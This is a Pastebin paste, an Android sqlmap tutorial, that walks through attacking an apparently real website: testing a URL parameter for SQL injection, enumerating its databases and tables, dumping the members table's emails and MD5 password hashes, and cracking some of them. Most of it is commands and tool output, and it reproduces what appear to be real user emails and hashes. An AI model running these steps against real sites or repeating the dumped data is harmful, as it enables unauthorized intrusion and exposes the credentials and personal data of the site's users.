API tools faq
paste
Advertisement
KekSec

Freaks Android SQLMap Tutorial

KekSec
Jul 26th, 2018
1,014
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 10.55 KB | None | 0 0
raw download clone embed print report
  1. to check if a website if vulnerable add a ' to the end of the URL
  2. like this:
  3. http://www.100safe.com/user.php?uid=46
  4. becomes:
  5. http://www.100safe.com/user.php?uid=46'
  6. if the website is vulnerable you should see an error like this somewhere on the page:
  7. You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
  8.  
  9. now we will need to install then open termux.
  10. first we need to install python 2 and unzip. type:
  11.  
  12. dpgk install python2 unzip
  13.  
  14. download the latest sqlmap zip package from sqlmap.org
  15.  
  16. next run these three commands:
  17. cd /sdcard/Download/
  18. unzip sqlmap*.zip
  19. cd sqlmap*
  20.  
  21. now we get started!
  22.  
  23. next we are going to list the databases on the target website, enter this command.
  24. python2 sqlmap.py --url=http://www.100safe.com/user.php?uid=46 --dbs
  25. if you get this it almost always means the site can be hacked:
  26. [10:57:59] [INFO] heuristic (basic) test shows that GET parameter 'uid' might be injectable (possible DBMS: 'MySQL')
  27. [10:58:00] [INFO] heuristic (XSS) test shows that GET parameter 'uid' might be vulnerable to cross-site scripting (XSS) attacks
  28. [10:58:00] [INFO] testing for SQL injection on GET parameter 'uid'
  29. once it says this:
  30. it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]
  31.  
  32. type Y then press enter
  33.  
  34. next you will get this
  35.  
  36. for the remaining tests, do you want to include all tests for 'MySQL' extending
  37. provided level (1) and risk (1) values? [Y/n]
  38.  
  39. type Y then press enter
  40.  
  41. once its done doing tests and finds a working injection method you will see output that should look like this:
  42.  
  43. [10:05:15] [INFO] fetching database names
  44. [10:05:15] [INFO] used SQL query returns 8 entries
  45. [10:05:15] [INFO] resumed: information_schema
  46. [10:05:15] [INFO] resumed: 100safe
  47. [10:05:15] [INFO] resumed: Iloveyou
  48. [10:05:15] [INFO] resumed: hypocket_api
  49. [10:05:15] [INFO] resumed: mysql
  50. [10:05:15] [INFO] resumed: now
  51. [10:05:15] [INFO] resumed: performance_schema
  52. [10:05:15] [INFO] resumed: superpay_api
  53. available databases [8]:
  54. [*] 100safe
  55. [*] hypocket_api
  56. [*] Iloveyou
  57. [*] information_schema
  58. [*] mysql
  59. [*] now
  60. [*] performance_schema
  61. [*] superpay_api
  62.  
  63. ^ those are the databases on the vulnerable server.
  64.  
  65. to list the tables in a database use this command:
  66. python2 sqlmap.py --url=http://www.100safe.com/user.php?uid=46 -D 100safe --tables
  67.  
  68. the output should look like this:
  69. [10:07:32] [INFO] fetching tables for database: '100safe'
  70. [10:07:32] [INFO] used SQL query returns 39 entries
  71. Database: 100safe
  72. [39 tables]
  73. +------------------+
  74. | pb_admingroups |
  75. | pb_adminlogs |
  76. | pb_adminonlines |
  77. | pb_announcements |
  78. | pb_applyinvite |
  79. | pb_attachments |
  80. | pb_categories |
  81. | pb_cdata |
  82. | pb_comments |
  83. | pb_commonlogs |
  84. | pb_configs |
  85. | pb_friends |
  86. | pb_fsession |
  87. | pb_guestmsg |
  88. | pb_invitecode |
  89. | pb_links |
  90. | pb_memberdata |
  91. | pb_memberexp |
  92. | pb_members |
  93. | pb_message |
  94. | pb_onlines |
  95. | pb_plugins |
  96. | pb_regions |
  97. | pb_scaches |
  98. | pb_sitestat |
  99. | pb_special |
  100. | pb_splink |
  101. | pb_tagcache |
  102. | pb_tags |
  103. | pb_tdata |
  104. | pb_templates |
  105. | pb_threads |
  106. | pb_threads_home |
  107. | pb_threads_tmp |
  108. | pb_tinfo |
  109. | pb_tinfo_home |
  110. | pb_tinfo_tmp |
  111. | pb_tplvar |
  112. | pb_usergroups |
  113. +------------------+
  114.  
  115. ^ those are the tables in the database "100safe"
  116.  
  117. obviously we want to choose dump (download or read) the table pb_members cause it likely contains passwords of users.
  118. first we have to list the columns in the table. type in this command:
  119. python2 sqlmap.py --url=http://www.100safe.com/user.php?uid=46 -D 100safe -T pb_members --columns
  120. the columns should look similar this for most user tables:
  121.  
  122. [10:25:43] [INFO] fetching columns for table 'pb_members' in database '100safe'
  123. [10:25:43] [INFO] used SQL query returns 9 entries
  124. [10:25:43] [INFO] resumed: uid
  125. [10:25:43] [INFO] resumed: mediumint(8) unsigned
  126. [10:25:43] [INFO] resumed: username
  127. [10:25:43] [INFO] resumed: varchar(20)
  128. [10:25:43] [INFO] resumed: password
  129. [10:25:43] [INFO] resumed: char(32)
  130. [10:25:43] [INFO] resumed: email
  131. [10:25:43] [INFO] resumed: varchar(100)
  132. [10:25:43] [INFO] resumed: adminid
  133. [10:25:43] [INFO] resumed: tinyint(3)
  134. [10:25:43] [INFO] resumed: groupid
  135. [10:25:43] [INFO] resumed: tinyint(3)
  136. [10:25:43] [INFO] resumed: publicemail
  137. [10:25:43] [INFO] resumed: tinyint(1)
  138. [10:25:43] [INFO] resumed: regip
  139. [10:25:43] [INFO] resumed: char(15)
  140. [10:25:43] [INFO] resumed: regdate
  141. [10:25:43] [INFO] resumed: int(10) unsigned
  142. Database: 100safe
  143. Table: pb_members
  144. [9 columns]
  145. +-------------+-----------------------+
  146. | Column | Type |
  147. +-------------+-----------------------+
  148. | adminid | tinyint(3) |
  149. | email | varchar(100) |
  150. | groupid | tinyint(3) |
  151. | password | char(32) |
  152. | publicemail | tinyint(1) |
  153. | regdate | int(10) unsigned |
  154. | regip | char(15) |
  155. | uid | mediumint(8) unsigned |
  156. | username | varchar(20) |
  157. +-------------+-----------------------+
  158.  
  159. Now we will extract all the entries in the columns email, and password from the database:
  160. python2 sqlmap.py --url=http://www.100safe.com/user.php?uid=46 -D 100safe -T pb_members -C email,password --dump
  161.  
  162. sadly the passwords on this site are encrypted with MD5, but we were able to crack a couple.
  163. by the way sometimes on other websites the passwords are all plaintext! (unencrypted!)
  164. here is the output with what you should type in the prompts already there so you know what to do.
  165.  
  166. [10:30:15] [INFO] fetching entries of column(s) 'email, password' for table 'pb_members' in database '100safe'
  167. [10:30:15] [INFO] used SQL query returns 790 entries
  168. [10:30:15] [WARNING] reflective value(s) found and filtering out
  169. [10:30:15] [INFO] retrieved: 1786ec46a1e6b28d3ede31ff2c4bf78b
  170. [10:30:15] [INFO] retrieved: 2plwvce9@30spmcuw.com
  171. [10:30:16] [INFO] retrieved: 49ba8995a4ed9671a0f7b8460c8fdedc
  172. [10:30:16] [INFO] retrieved: 3216016593@qq.com
  173. [10:30:16] [INFO] retrieved: b79b84652032835f635b4d0d4dd149e3
  174. [10:30:17] [INFO] retrieved: 39p532uq@5jbrl7qb.com
  175. [10:30:17] [INFO] retrieved: d8a79e5469223f6800448a2e247efdb7
  176. [10:30:17] [INFO] retrieved: 3e3yng79@r5odsr8g.com
  177. [10:30:17] [INFO] retrieved: 3653f8e024ade70beaf337c647af8eda
  178. [10:30:18] [INFO] retrieved: 3ioo9ytx@17igz8i8.com
  179. [10:30:18] [INFO] retrieved: d958f8dec96e85768387583d4cbb26dc
  180. [10:30:18] [INFO] retrieved: 3vxah88n@eoguvus4.com
  181. [10:30:19] [INFO] retrieved: 76ee1658d44021e53831bce63a465b37
  182. [10:30:19] [INFO] retrieved: 43w6ua0g@3cmq9zgd.com
  183. [10:30:19] [INFO] retrieved: fef3d38d2fed7a7f9d1c7f29a2c67a83
  184. [10:30:19] [INFO] retrieved: 446382023@qq.com
  185. [10:30:20] [INFO] retrieved: f96602e40dde4889fc2da79c3514abf3
  186.  
  187. [10:30:20] [WARNING] user aborted during enumeration. sqlmap will display partial output
  188. [10:30:20] [INFO] recognized possible password hashes in column 'password'
  189. do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] N
  190. do you want to crack them via a dictionary-based attack? [Y/n/q] Y
  191. [10:30:31] [INFO] using hash method 'md5_generic_passwd'
  192. what dictionary do you want to use?
  193. [1] default dictionary file 'C:\Users\New Owner\Desktop\Cracking\sqlmapproject-s
  194. qlmap-5e2d0bd\txt\wordlist.zip' (press Enter)
  195. [2] custom dictionary file
  196. [3] file with list of dictionary files
  197. > 1
  198. [10:30:35] [INFO] using default dictionary
  199. do you want to use common password suffixes? (slow!) [y/N] N
  200. [10:30:38] [INFO] starting dictionary-based cracking (md5_generic_passwd)
  201. [10:30:38] [INFO] starting 2 processes
  202. [10:30:44] [INFO] cracked password '19850110' for hash 'dd3cda213b3da62490992d6a5e181874'
  203. [10:30:45] [INFO] cracked password '123456' for hash 'e10adc3949ba59abbe56e057f20f883e'
  204. Database: 100safe
  205. Table: pb_members
  206. [27 entries]
  207. +------------------------+---------------------------------------------+
  208. | email | password |
  209. +------------------------+---------------------------------------------+
  210. | 03ac6xea@fvhpa9ch.com | d6ff2b7b856f3b445340e9ccdf157929 |
  211. | 0408eric@pchome.com.tw | c96a267ff0f21de27cc50f9c45c3b8fb |
  212. | 07fff12w@quamhish.com | 891cbd7089d0e9f11a271b01cdf46e74 |
  213. | 0980155147@qma.com.tw | dd3cda213b3da62490992d6a5e181874 (19850110) |
  214. | 0azdydba@acaajp4m.com | 1b6b638cc4d1d7d32928e2f9b80b1797 |
  215. | 0bbgzl32@jssm911y.com | 1947e832f3baf43b0b4b5f5917ea1df5 |
  216. | 0ojrmsbz@ybru62d2.com | a38fcd68f6d7639ce1562020dd7e20e3 |
  217. | 0qgl9cts@qp6ccox9.com | 0385ee7071f1bb3f8712583f881b02ab |
  218. | 0xq4trm9@h5rzk35x.com | 8adfb726303aa07c55dc7b255e67ad4b |
  219. | 1048825dfdf152@qq.com | 02569624d5d0f06b17715d93d9eccc96 |
  220. | 1312760466@qq.com | e10adc3949ba59abbe56e057f20f883e (123456) |
  221. | 1598784253@qq.com | b71588f2be4628689b70beee50fe760f |
  222. | 1nca4m9o@zrr575k6.com | e3f87375269063de254da661034b537a |
  223. | 1nwpkj4a@iaysr57h.com | dddca8c5a130281102228c4b0f8b3b32 |
  224. | 1vml8miz@hadf8rqa.com | 6fe0ae027b11a404987d5431d71c2125 |
  225. | 2161283@163.com | e10adc3949ba59abbe56e057f20f883e (123456) |
  226. | 234owhb3@0ozh2tcs.com | 779ddc203741c1892a3456a951b73a9a |
  227. | 2ltlsq9i@cka0adls.com | 05494fa729bbefcf1acea2c180c7e04a |
  228. | 2nwy5tvv@rwe8lbpt.com | 1786ec46a1e6b28d3ede31ff2c4bf78b |
  229. | 2plwvce9@30spmcuw.com | 49ba8995a4ed9671a0f7b8460c8fdedc |
  230. | 3216016593@qq.com | b79b84652032835f635b4d0d4dd149e3 |
  231. | 39p532uq@5jbrl7qb.com | d8a79e5469223f6800448a2e247efdb7 |
  232. | 3e3yng79@r5odsr8g.com | 3653f8e024ade70beaf337c647af8eda |
  233. | 3ioo9ytx@17igz8i8.com | d958f8dec96e85768387583d4cbb26dc |
  234. | 3vxah88n@eoguvus4.com | 76ee1658d44021e53831bce63a465b37 |
  235. | 43w6ua0g@3cmq9zgd.com | fef3d38d2fed7a7f9d1c7f29a2c67a83 |
  236. | 446382023@qq.com | f96602e40dde4889fc2da79c3514abf3 |
  237. +------------------------+---------------------------------------------+
  238.  
  239. [10:32:32] [INFO] table '`100safe`.pb_members' dumped to CSV file 'C:\Users\New Owner\.sqlmap\output\www.100safe.com\dump\100safe\pb_members.csv'
  240.  
  241. you can increase the speed of dumping by adding the option --threads=10 to the end of the dump command.
  242.  
  243. and ya thats basically it! thats pretty much all you need to know about sqlmap!!! happy hacking mister 1337
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!